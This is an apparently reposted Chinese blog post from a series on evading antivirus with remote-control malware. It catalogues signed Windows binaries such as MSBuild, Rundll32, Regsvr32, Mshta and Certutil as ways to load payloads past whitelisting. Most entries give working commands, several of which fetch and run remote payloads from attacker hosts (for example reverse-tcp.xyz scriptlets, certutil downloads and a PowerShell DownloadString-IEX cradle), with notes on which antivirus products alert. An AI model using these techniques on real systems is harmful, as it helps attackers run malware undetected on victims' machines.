zoukankan      html  css  js  c++  java
  • 远控免杀从入门到实践之白名单(113个)总结篇

    《远控免杀从入门到实践》系列文章目录:

    1、远控免杀从入门到实践 (1)基础篇

    2、远控免杀从入门到实践 (2)工具总结篇

    3、远控免杀从入门到实践 (3)代码篇-C/C++

    4、远控免杀从入门到实践 (4)代码篇-C#

    5、远控免杀从入门到实践 (5)代码篇-Python

    6、远控免杀从入门到实践 (6)代码篇-Powershell

    7、远控免杀从入门到实践 (7)代码篇-Golang+Ruby

    8、远控免杀从入门到实践 (8)shellcode免杀实践

    9、远控免杀从入门到实践(9)白名单(113个)总结篇

    关于白名单程序

    相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称“Living-Off-the-Land Binaries”,直白翻译为“生活在陆地上的二进制“,这个概念最初在2013年DerbyCon黑客大会由Christopher Campbell和Matt Graeber进行创造,最终Philip Goh提出了LOLBins这个概念。

    什么程序才能称之为LOLBins:

    1、可以是带有Microsoft签名的二进制文件,可以是Microsoft系统目录中二进制文件。

    2、可以是第三方认证签名程序。

    3、具有对APT或红队渗透方有用的功能

    4、该程序除过正常的功能外,可以做意料之外的行为。(如:执行恶意代码、绕过UAC)。

    本系列文章从专题34到专题63,共介绍了33个常见的白名单程序,分别为:Rundll32.exe、Msiexec.exe、MSBuild.exe、InstallUtil.exe、Mshta.exe、Regsv***.exe、Cmstp.exe、CScript.exe、WScript.exe、Forfiles.exe、te.exe、Odbcconf.exe、InfDefaultInstall.exe、Diskshadow.exe、PsExec.exe、Msdeploy.exe、Winword.exe、Regasm.exe、Regsvcs.exe、Ftp.exe、pubprn.vbs、winrm.vbs、slmgr.vbs、Xwizard.exe、Compiler.exe、IEExec.exe、MavInject32、Presentationhost.exe、Wmic.exe、Pcalua.exe、Url.dll、zipfldr.dll、Syncappvpublishingserver.vbs。

    其实还有大量的LOLBins程序可以被利用,只是有些利用条件比较苛刻,有些是用来下载而不是用来执行payload的,我从https://lolbas-project.github.io等其他站点共搜集到113个,除了之前介绍的33个外,还有另外的80个白利用程序也在这做简要介绍。

    由于白名单程序加载payload的免杀测试需要杀软的行为检测才合理,静态查杀payload或者查杀白名单程序都没有任何意义,所以这里对白名单程序的免杀效果不做评判。

    免杀系列文章及相关软件下载:https://github.com/TideSec/BypassAntiVirus

    本文内容摘要

    1、执行命令类(已测试33个)

    这是从众多白名单程序里搜集了一些知名度比较高也比较通用一些的白名单进行了逐一测试,这些程序的具体介绍已经在”Tide安全团队”公众号上发布,这是只是简单罗列一下。

    2、其他MS windows程序(45个)

    这些也都是windows自带的可执行程序,有的利用起来条件稍微苛刻,感兴趣的可以逐一测试。

    3、系统库文件(10个)

    windows自带的dll文件,一般需要使用rundll32来加载执行。

    4、其他MS程序(21个)

    并非windows自带,但属于微软配套的用的较多的软件,比如office、donet、visual studio等程序安装后引入的程序。

    5、脚本文件(4个)

    windows自带的脚本文件,可用来加载payload。

    执行命令类(已测试33个)

    在本免杀专题34到专题63(已发布在我们团队的公众号”Tide安全团队”上),共搜集了33个常见的白名单程序,并一一进行了分析和详细测试,本部分也是对这些已进行了测试的白名单程序进行简要汇总,详细测试过程可参考相应文章链接。

    MSBuild.exe

    杀软行为检测:xml能免杀时不会触发杀软行为预警。

    详细文章链接:https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA

    Microsoft Build Engine是一个用于构建应用程序的平台,此引擎也被称为msbuild,它为项目文件提供一个XML模式,该模式控制构建平台如何处理和构建软件。Visual Studio使用MSBuild,但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe,可以在未安装Visual Studio的环境中编译和生成程序。

    执行方式:

    msbuild.exe加载文件的方式有两种

    1. 本地加载执行:
    - %windir%Microsoft.NETFrameworkv4.0.30319msbuild.exe <folder_path_here>msbuild_nps.xml
    2. 远程文件执行:
    wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%Microsoft.NETFrameworkv4.0.30319msbuild.exe \<attackerip><share>msbuild_nps.xml

    Msiexec.exe

    杀软行为检测:执行时杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg

    看到msiexec可能还有点陌生,但说道.msi可能就比较熟悉了,在windows下很多软件安装就是.msi格式的。当Windows操作系统安装了Windows Installer引擎,而MSI软件包使用该引擎来 安装应用程序,解释包和安装产品的可执行程序就是我们这用到 的Msiexec.exe。

    执行方式:

    msi文件可以双击执行,也可以命令行静默执行,而且msiexec也同样支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行:

    msiexec /q /i http://www.tidesec.com/shell/shell.msi

    InstallUtil.exe

    杀软行为检测:360安全卫士会检测到InstallUtil.exe执行预警,360杀毒和火绒动态和静态均无预警。

    详细文章链接:https://mp.weixin.qq.com/s/gN2p3ZHODZFia2761BVSzg

    InstallUtil.exe算是免杀白名单里使用比较多的一个了,InstallUtil.exe可以用于安装有.NET开发的所有应用安装程序,如果要使用 .NET Framework 开发 Windows 服务,则可以使用installutil.exe命令行快速安装服务应用程序。

    metasploit自带的evasion免杀模块,就提供了windows/applocker_evasion_install_util来直接创建InstallUtil.exe可加载的payload,详见远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

    另外,专题20里的GreatSCT也提供了基于InstallUtil.exe的免杀:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ

    执行方式:

    使用csc编译InstallUtil-ShellCode.cs

    C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /unsafe /platform:x86 /out:C:	estshell.exe C:	estInstallUtil-ShellCode.cs

    使用InstallUtil.exe执行shell.exe

    C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe /logfile= /LogToConsole=false /U C:testshell.exe

    Mshta.exe

    杀软行为检测:hta能免杀时不会触发杀软行为预警。

    详细文章链接:https://mp.weixin.qq.com/s/oBr-syv2ef5IjeGFrs7sHg

    Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。

    路径:

    C:WindowsSystem32mshta.exe
    C:WindowsSysWOW64mshta.exe

    执行方式:

    执行hta

    mshta.exe evilfile.hta

    Rundll32.exe

    杀软行为检测:执行时火绒会行为预警

    详细文章链接:https://mp.weixin.qq.com/s/rm**AWC6HmcphozfEZhRGA

    Rundll32.exe,可以执行32位的DLL文件,以命令行的方式调用动态链接程序库。。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样就实现了进程上的隐藏。系统中还有一个Rundll.exe文件,可以执行16位的DLL文件。

    Rundll32.exe令行下的使用方法为:Rundll32.exe DLLname,Functionname,需注意x86,x64位的Rundll32调用,64位的系统默认调用的是64位Rundll32.exe(在C:WindowsSystem32目录下)。

    Windows 7 默认位置:

    64位 C:WindowsSystem32rundll32.exe
    32位 C:WindowsSysWOW64rundll32.exe

    执行方式:

    Rundll32的使用,参考自ATT&CK手册。

    1)直接执行dll文件

    rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
    rundll32.exe "C:Windowstwain_64.dll",EntryPoint

    2)调用系统中原生存在的dll中的未记录dll函数

    2.1)调用shell32.dll函数执行控制面板项文件(.cpl)

    rundll32 shell32.dll,Control_RunDLL <文件名>
    control.exe test.cpl

    2.2)Advpack.dll – LaunchINFSection

    advpack.dll用于帮助硬件和软件读取和验证·INF文件。正如老话所说,”大部分安全问题本质就是功能被误用“,advpack.dll也可以被攻击者利用进行代码/指令代理执行,

    rundll32.exe advpack.dll,LaunchINFSection  c:	est.inf,DefaultInstall_SingleUser,1,
    C:\Windows\System32\rundll32 advpack.dll,LaunchINFSectionEx C:\Windows\system32\ieuinit.inf,Install
    Requires admin: No
    Windows binary: Yes
    Bypasses AppLocker Default rules: Yes

    2.3)Advpack.dll – RegisterOCX

    rundll32.exe advpack.dll,RegisterOCX calc.exe
    Requires admin: No
    Windows binary: Yes
    Bypasses AppLocker Default rules: Yes

    2.4)zipfldr.dll – RouteTheCall

    rundll32.exe zipfldr.dll,RouteTheCall calc.exe

    2.5)url.dll – OpenURL

    rundll32  url.dll,OpenURL file://C:/Windows/system32/calc.exe 
    rundll32.exe url.dll,OpenURL "C:	estcalc.hta"
    rundll32.exe url.dll,OpenURL "C:	estcalc.url"
    rundll32.exe  url.dll,OpenURL http://192.168.1.4/Micropoor_url_dll.hta

    2.6)url.dll – FileProtocolHandler

    rundll32.exe url.dll, FileProtocolHandler calc.exe

    2.7)ieframe.dll – OpenURL

    rundll32.exe ieframe.dll,OpenURL "C:testcalc.url"

    2.8)shdocvw.dll – OpenURL

    rundll32.exe shdocvw.dll,OpenURL "C:testcalc.url"

    2.9)ieadvpack.dll – LaunchINFSection

    rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,

    2.10)shell32.dll – ShellExec_RunDLL

    rundll32.exe shell32.dll,ShellExec_RunDLL 
    C:WindowsSystem32calc.exe

    2.11)pcwutl.dll – LaunchApplication

    rundll32.exe C:WindowsSystem32pcwutl.dll,LaunchApplication calc.exe

    2.12)Setupapi.dll – InstallHinfSection

    # Launch an executable file via the InstallHinfSection function and .inf file section directive.
    rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf

    2.13)Syssetup.dll – SetupInfObjectInstallAction

    # Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
    rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:	empsomething.inf

    3)执行javascript脚本

    rundll32 javascript:"..mshtml,RunHTMLApplication";o=GetObject("script:http://reverse-tcp.xyz/payload.sct");window.close();
    rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");
    rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

    Regsv***.exe

    杀软行为检测:360和火绒都会行为预警

    详细文章链接:https://mp.weixin.qq.com/s/6v8w2YZLxHJFnXb-IbnYAA

    Regsv***是一个命令行实用程序,用于注册和取消注册OLE控件,例如Windows注册表中的DLL和ActiveX控件,以命令行方式运行。Regsv***.exe安装在Windows XP及更高版本的Windows的%systemroot%System32 文件夹中。当通过regsv***中注册一个dll文件时,有关与regsv***关联的程序的信息将会被添加到Windows中,然后访问这些进程查看器以了解程序数据的位置以及如何与程序数据进行交互。在注册一个dll文件时,会将信息添加到目录中,以便Windows可以使用它。通常,除了注册和注销dll文件外,此文件不常用。

    Regsv***.exe分32位和64位,在windows系统中的位置

    64位:C:WINDOWSSysWOW64
    egsv***.exe
    32位:C:WINDOWSsystem32
    egsv***.exe

    执行方式:

    执行本地脚本

    regsv***.exe /s /u /i:file.sct scrobj.dll

    加载远程脚本执行

    regsv***.exe /s /u /i:http://reverse-tcp.xyz/file.sct scrobj.dll
    regsv***.exe /u /n /s /i:\webdavserverfolderpayload.sct scrobj.dll

    Cmstp.exe

    杀软行为检测:执行时360会行为预警,火绒无响应

    详细文章链接:https://mp.weixin.qq.com/s/tgtvOMDGlKFwdRQEnKJf5Q

    Microsoft连接管理器配置文件安装程序(CMSTP.exe)是用于安装连接管理器服务配置文件的命令行程序。CMSTP.exe接受安装信息文件(INF)作为参数,并安装用于远程访问连接的服务配置文件。

    攻击者可能会使用CMSTP.exe调用恶意的INF文件。与Regsv*** 相似,CMSTP.exe可能被利用从远程服务器加载和执行DLL或COM脚本(SCT)。由于CMSTP.exe是合法的,经过签名的Microsoft应用程序,因此该执行过程也可以绕过AppLocker和其他白名单防御。

    在windows中文件路径

    64位 C:WindowsSystem32cmstp.exe
    32位 C:WindowsSysWOW64cmstp.exe

    执行方式:

    执行本地payload:cmstp.exe /ni /s c:cmstpCorpVPN.inf

    执行远程payload:cmstp.exe /ni /s \10.211.55.28 estcmstp.inf

    Ftp.exe

    杀软行为检测:不会触发行为预警

    详细文章链接:https://mp.weixin.qq.com/s/rnmCIx5oxA9z-0OfjoUAVw

    Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。

    Windows 2003 默认位置:

    C:WindowsSystem32ftp.exe
    C:WindowsSysWOW64ftp.exe

    Windows 7 默认位置:

    C:WindowsSystem32ftp.exe
    C:WindowsSysWOW64ftp.exe

    执行方式:

    echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

    Regasm.exe/Regsvcs.exe

    杀软行为检测:执行时触发行为预警

    详细文章链接:https://mp.weixin.qq.com/s/MCMjxPdUNdwV8is04AklLA

    Regsvcs和Regasm是Windows命令行实用程序,用于注册.NET组件对象模型(COM)程序集。两者都是由Microsoft进行数字签名的。攻击者可以使用Regsvcs和Regasm代理通过受信任的Windows实用程序执行代码。两个实用程序可用于通过使用二进制内的属性来绕过进程白名单,以指定应在注册或取消注册之前运行的代码:[ComRegisterFunction]或[ComUnregisterFunction]分别。即使进程在权限不足的情况下运行并且无法执行,也将执行具有注册和取消注册属性的代码。

    执行方式:

    regasm.exe AllTheThingsx64.dll
    regsvcs.exe AllTheThingsx64.dll

    Compiler.exe

    杀软行为检测:触发行为预警

    详细文章链接:https://mp.weixin.qq.com/s/Sm_3cJlSk6Pud1CLp-eAEQ

    Microsoft.Workflow.Comiler.exe是.NET Framework默认自带的一个实用工具,用户能够以XOML工作流文件的形式提供一个序列化工作流来执行任意未签名的代码。

    注意:如果Microsoft.Workflow.Compiler命令无法识别,可能是Microsoft.Workflow.Compiler.exe所在路径没有被系统添加PATH环境变量中。

    Win7的Compiler.exe默认位置:

    C:WindowsMicrosoft.NETFrameworkv4.0.30319Microsoft.Workflow.Compiler.exe
    C:WindowsMicrosoft.NETFramework64v4.0.30319Microsoft.Workflow.Compiler.exe

    执行方式:

    Microsoft.Workflow.Compiler.exe tests.xml results.xml

    MavInject.exe

    杀软行为检测:未触发行为预警

    详细文章链接:https://mp.weixin.qq.com/s/dPOGj1VLhqwxJ0e-gOs8vA

    MavInject32.exe是微软应用程序虚拟化的一部分,可以直接完成向某一进程注入代码的功能。

    64位系统下的文件位置:C:Program FilesCommon Filesmicrosoft sharedClickToRunMavInject32.exe

    执行方式:

    C:Program FilesCommon Filesmicrosoft sharedClickToRunMavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>

    presentationhost.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/r9l5Lh6MHv-Ece2DFr3EsA

    Presentationhost.exe是一个内置的Windows可执行文件,用于运行XAML浏览器应用程序(即.xbap文件)。在多个AppLocker白名单绕过列表中,Presentationhost.exe都位列其中(例如api0cradl和milkdevil)。

    当我们打开.xbap文件的时候其实不是在IE中启动的应用程序,而是在Presentationhost.exe中运行,通常是在一个沙箱中以保护用户免受恶意代码的攻击。

    执行方式:

    Presentationhost.exe C:tempEvil.xbap

    IEexec.exe

    杀软行为检测:未触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/wVbFrU9cE3hCYAENjmnSUQ

    IEexec.exe应用程序是.NET Framework附带程序,存在于多个系统白名单内。可以将IEExec.exe应用程序用作主机,以运行使用URL启动的其他托管应用程序。

    IEexe.exe在64位系统路径为:C:WindowsMicrosoft.NETFramework64v2.0.50727

    执行方式:

    ieexec.exe http://x.x.x.x:8080/bypass.exe

    winrm.vbs/slmgr.vbs

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/B3oiMrEB98jtm4DvD2t2tQ

    winrm.vbs(System32中的Windows签名脚本)能够使用和执行攻击者控制的XSL,而XSL不受“enlightened script host”的限制,导致任意的、无签名的代码执行。

    winrm.vbs文件位置:

    C:windowssystem32winrm.vbs
    C:windowsSysWOW64winrm.vbs

    执行方式:

    cscript /b C:WindowsSystem32slmgr.vbs
    winrm quickconfig

    pubprn.vbs

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/btiaVMBPxfxG4oXPa7__kw

    在Windows 7+上,存在一个Microsoft签名的WSH脚本,名为PubPrn.vbs,该脚本位于“ C: Windows System32 Printing_Admin_Scripts en-US中。在查看此特定脚本时,很明显它正在接受用户提供的输入(通过命令行参数)并将参数传递给“GetObject()。

    文件位置:C:WindowsSystem32Printing_Admin_Scriptsen-USpubprn.vbs

    执行方式:

    C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1 script:http://10.211.55.5/msf.sct

    Xwizard.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/8gaweOqkOrT77riaevvFUg

    xwizard.exe应该为Extensible wizard的缩写,中文翻译可扩展的向导主机进程,暂时无法获得官方资料。

    利用xwizard.exe加载dll可以绕过应用程序白名单限制,该方法最大的特点是xwizard.exe自带微软签名,在某种程度上说,能够绕过应用程序白名单的拦截。

    xwizard.exe支持Win7及以上操作系统,位于%windir%system32下。

    对应64位系统:

    %windir%system32对应64位xwizard.exe,只能加载64位xwizards.dll

    %windir%SysWOW64对应32位xwizard.exe,只能加载32位xwizards.dll

    执行方式:

    xwizard processXMLFile 1.txt

    winword.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/qXWK5i2cDaletSzkAEzL3w

    winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。

    执行方式:

    winword.exe "http://192.168.19.146/shell.dll"

    msdeloy.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/1oEzadXZxd3JukrBhNxxyw

    msdeploy.exe是微软提供的web部署命令行工具,通过它可以方便的部署web应用、数据库等,路径在C:Program FilesIISMicrosoft Web Deploy V3。msdeloy.exe可以使IIS可以在本地或远程同步,打包和部署Web应用程序,网站或Web服务器内容和配置。它具有众多功能,这些功能可以高度精确地包括要处理的那些组件,并排除那些不需要的组件。为了能够使用Web Deploy,必须已在源计算机和目标计算机上安装IIS。

    执行方式:

    msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:Program FilesIISMicrosoft Web Deploy V3w_re.exe"

    psexec.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/JdOmlqif67GcSqZuuGPz0Q

    PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性。在windows系统并未默认安装,下载地址见参考文章。

    执行方式:

    psexec执行payload:

    psexec.exe -s -d msiexec /q /i http://yourservice/shell/win_re.txt
    //-s 以system权限执行
    // -d 不产生交互式窗口

    WMIC.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/QNqM8Vdlu-SOP7ZqnRWY3w

    WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。

    Windows 2003 默认位置:

    C:WINDOWSsystem32wbemwmic.exe C:WINDOWSSysWOW64wbemwmic.exe

    Windows 7 默认位置:

    C:WindowsSystem32wbemWMIC.exe C:WindowsSysWOW64wbemWMIC.exe

    执行方式:

    wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

    SyncAppvPublishingServer.vbs

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/Ud7TbeMJb8fsRlaGHWhBww

    Windows上有两个版本的SyncAppVPublishingServer工具,它们是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。

    执行方式:

    在powershell下执行

    SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"

    Pcalua.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/Aj9A5_LRS_uX8XN1rdUobQ

    Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。

    默认在C:WindowsSystem32pcalua.exe

    执行方式:

    Pcalua -m -a payload

    zipfldr.dll

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/-qPVenI_lk-ZnMA4j9XNRQ

    zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。

    说明:zipfldr.dll所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。Windows 2003 默认位置:

    C:WindowsSystem32zipfldr.dll
    C:WindowsSysWOW64zipfldr.dll

    Windows 7 默认位置:

    C:WindowsSystem32zipfldr.dll
    C:WindowsSysWOW64zipfldr.dll

    执行方式:

    rundll32.exe zipfldr.dll,RouteTheCall msf.exe

    Url.dll

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/GzoYvfj7NkXe_nc8eOVEBQ

    url.dll是Internet快捷壳扩展相关应用程序接口系统文件。url.dll所在路径已被系统添加PATH环境变量中,因此,url.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。

    Windows 2003 默认位置:

    C:WindowsSystem32url.dll
    C:WindowsSysWOW64url.dll

    Windows 7 默认位置:

    C:WindowsSystem32url.dll
    C:WindowsSysWOW64url.dll

    执行方式:

    rundll32.exe url.dll, OpenURL file://c:windowssystem32calc.exe
    rundll32.exe url.dll, OpenURLA file://c:windowssystem32calc.exe
    rundll32.exe url.dll, FileProtocolHandler calc.exe

    DiskShadow.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/pr0KYjk80YIk4qJO5h3Yaw

    diskshadow.exe是一种工具,可公开卷影复制服务(VSS)提供的功能。默认情况下,diskshadow使用类似于diskraid或DiskPart的交互式命令解释器。diskshadow还包括可编写脚本的模式。(详见微软官方文档https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow

    执行方式:

    diskshadow.exe /s c:testdiskshadow.txt

    Odbcconf.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/uOwqbW0nkG776zZz6O_WFA

    Odbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver15)。

    Odbcconf.exe在windows中的的一般路径为C:WindowsSystem32odbcconf.exe C:WindowsSysWOW64odbcconf.exe

    执行方式:

    odbcconf.exe /a {regsvr C:UsersAdministratorDesktophacker.dll}

    Forfiles.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/1-HyeNrd4IXQYsyG6dHQkw

    Forfiles是一款windows平台默认安装的文件操作搜索工具之一,可以通过文件名称,修改日期等条件选择文件并运行一个命令来操作文件。它可以直接在命令行中使用,也可以在批处理文件或其他脚本中使用。

    默认安装位置:

    C:WINDOWSsystem32forfiles.exe
    C:WINDOWSSysWOW64forfiles.exe

    说明:Forfiles.exe所在路径已被系统添加PATH环境变量中,因此,Forfiles命令可识别,需注意x86,x64位的Forfiles调用。

    执行方式:

    forfiles /p c:windowssystem32 /m cmd.exe /c "msiexec.exe /q /i C:UsersadministratorDesktopTIDE.txt"

    Te.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/m37wm620qQ1xw4BN2hGOpg

    如果安装了TAEF(Test Authoring and Execution Framework)框架并且位于列入白名单的路径中,则可以使用它,需要在计算机上安装Visual Studio和WDK。

    微软官方文档:https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/

    默认安装位置:

    C: program files(x86)Windows Kits10	estingRuntimesTAEF

    使用脚本语言编写测试,Windows仅支持JScript和VBScript。

    执行方式:

    te.exe bypass.wsc

    CScript.exe/WScript.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/jzWHq7Yc1UjOwnXulIAPKQ

    系统文件cscript.exe是存放在Windows系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要,Windows Script Host引擎在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。

    wscript全称“Windows Scripting Host”,是一种批次语言/自动执行工具——它所对应的程序“wscript.exe”是一个脚本语言解释器,位于C:WINDOWSsystem32目录下,正是它才使得脚本可以被执行,就象执行批处理一样,可以拿来执行.wsh,.vbs,.js等。

    WScript是一个窗口化的版本;CScript是一个命令行的版本。两种版本都可以运行任何脚本。二者之间的区别是,窗口化版本(WScript)使用一个弹出对话框来显示文本输出消息,而命令行版本(CSCript)通过命令行程序所见的、常规的“标准输出”方法来显示文本。

    CScript/WScript可以用来执行vbs和js等脚本,是否能达到免杀的目的取决于执行的脚本本身的免杀能力。

    执行方式:

    使用cscript.exe执行生成的vbs脚本。

    cscript.exe TIDE.vbs

    使用WScript.exe执行vbs反弹脚本,和cscript.exe相比命令行中没有文本输出信息。

    WScript.exe TIDE.vbs

    InfDefaultInstall.exe

    杀软行为检测:触发杀软行为预警

    详细文章链接:https://mp.weixin.qq.com/s/mrtX4ayCXJJ1LPfBlSuvHw

    InfDefaultInstall.exe是一个用来进行inf安装的工具,具有微软签名,存在路径为:

    C:WindowsSystem32Infdefaultinstall.exe
    C:WindowsSysWOW64Infdefaultinstall.exe

    执行方式:

    InfDefaultInstall.exe "C:xxxshady.inf"

    其他MS windows程序(45个)

    At.exe

    使用说明:

    windows计划任务程序。

    文件路径:

    C:WINDOWSSystem32At.exe
    C:WINDOWSSysWOW64At.exe

    执行方式:

    C:WindowsSystem32at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:WindowsSystem32
    evshell.exe

    参考资料:

    https://freddiebarrsmith.com/at.txt
    https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
    https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

    Atbroker.exe

    使用说明:

    windows辅助技术AT程序。

    文件路径:

    C:WindowsSystem32Atbroker.exe
    C:WindowsSysWOW64Atbroker.exe

    执行方式:

    ATBroker.exe /start malware

    参考资料:

    http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

    Bash.exe

    使用说明:Windows子系统用于Linux的文件

    文件路径:

    C:WindowsSystem32bash.exe
    C:WindowsSysWOW64bash.exe

    执行方式:

    bash.exe -c calc.exe

    参考资料:

    https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

    Bitsadmin.exe

    使用说明:用于管理后台文件传输的程序。

    文件路径:

    C:WindowsSystem32bitsadmin.exe
    C:WindowsSysWOW64bitsadmin.exe

    执行方式:

    bitsadmin /create 1 & bitsadmin /addfile 1 c:windowssystem32cmd.exe c:dataplayfoldercmd.exe & bitsadmin /SetNotifyCmdLine 1 c:dataplayfoldercmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

    下载文件

    bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:dataplayfolderautoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

    参考资料:

    https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
    
    https://www.*******.com/watch?v=_8xJaaQlpBo
    
    https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

    Certutil.exe

    使用说明:

    Certutil.exe是一个命令行程序,作为证书服务的一部分安装。我们可以使用此工具在目标计算机上执行我们的恶意exe文件以获取meterpreter会话。

    文件路径:

    C:WindowsSystem32certutil.exe
    C:WindowsSysWOW64certutil.exe

    执行方式:

    certutil -urlcache -split -f http://x.x.x.x/msf a.exe && a.exe
    certutil.exe -urlcache -split -f http://x.x.x.x/x.jar &&java -jar x.jar
    certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    certutil -encode inputFileName encodedOutputFileName
    certutil -decode encodedInputFileName decodedOutputFileName

    参考资料:

    https://twitter.com/Moriarty_Meng/status/984380793383370752
    
    https://twitter.com/mattifestation/status/620107926288515072
    
    https://twitter.com/egre55/status/1087685529016193025

    Cmd.exe

    使用说明:

    windows命令行程序。

    文件路径:

    C:WindowsSystem32cmd.exe
    C:WindowsSysWOW64cmd.exe

    执行方式:

    cmd.exe /c echo regsv***.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSv***.sct ^scrobj.dll > fakefile.doc:payload.bat
    cmd.exe - < fakefile.doc:payload.bat

    参考资料:

    https://twitter.com/yeyint_mth/status/1143824979139579904

    Cmdkey.exe

    使用说明:创建、列出和删除存储的用户名以及密码或凭据。

    文件路径:

    C:WindowsSystem32cmdkey.exe
    C:WindowsSysWOW64cmdkey.exe

    执行方式:

    cmdkey /list

    参考资料:

    https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
    https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey

    Control.exe

    使用说明:

    用于在Windows中启动控制面板项目的程序。

    文件路径:

    C:WindowsSystem32control.exe
    C:WindowsSysWOW64control.exe

    执行方式:

    control.exe c:windowstasksfile.txt:evil.dll

    参考资料:

    https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
    
